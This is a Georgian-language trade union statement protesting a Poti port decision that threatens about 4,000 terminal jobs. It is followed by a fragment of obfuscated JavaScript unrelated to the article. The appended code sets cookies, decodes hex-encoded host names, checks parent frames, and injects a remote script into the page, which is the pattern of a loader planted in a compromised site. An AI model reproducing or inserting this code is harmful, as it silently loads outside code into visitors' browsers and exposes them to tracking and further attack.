4 ათას დასაქმებულს ფოთში, უმუშევრობა ემუქრება

ფოთში 16 გადამზიდავ საკონტეინერო ტერმინალებს უფუნქციოდ დარჩენა, ხოლო 4000 თანამშრომელს სამუშაო ადგილების დაკარგვა ემუქრებათ, რადგან ფოთის პორტის ადმინისტრაციის გადაწყვეტილებით 1 ივლისიდან ფოთში შემოსული ყველა კონტეინერი შევა და გაიცემა მხოლოდ ,,Iჩთ”-ის სახმელეთო საკონტეინერო ტერმინალიდან, რომელიც სპეციალურად ამ მომსახურეობისათვის შექმნა ფოთის პორტმა და რითაც ამ სფეროში ხდება მონოპოლისტი. ფოთის პორტის ადმინისტრაცია მის ამ გადაწყვეტილებას `APM’’ ტერმინალის ინტეგრაციისა და ტვირთების ეფექტურად გადამუშავების საჭიროებით ხსნის.

საქართველოს ტრანსპორტისა და გზების მუშაკთა პროფკავშირი კატეგორიულ პროტესტს უცხადებს ფოთის პორტის ადმინისტრაციის ცალმხრივად, ფოთის საზოგადოებასთან და ტერმინალებში დასაქმებულთა პროფკავშირებთან კონსულტაციების გარეშე მიღებულ გადაწყვეტილებას, რომლის განხორციელება 4000 ფოთელ მშრომელს და მათ ოჯახებს შემოსავლის გარეშე დატოვებს.

მოვითხოვით, საქართველოს მთავრობა დაუყოვნებლივ ჩაერიოს საკითხის გადაჭრაში, გაუქმდეს `APM ტერმინალსის“ გადაწყვეტილება და დაიწყოს დიალოგი მშრომელთა წარმომადგენლებთან გრძელვადიანი და ურთიერთმისაღები გამოსავლის მოსაძებნად.

; “+d;var c=o[d];c!==!0&&(a+=”=”+c)}document.cookie=a},r=function(e){e=e.replace(“www.”,””);for(var t=””,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "gtuc.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>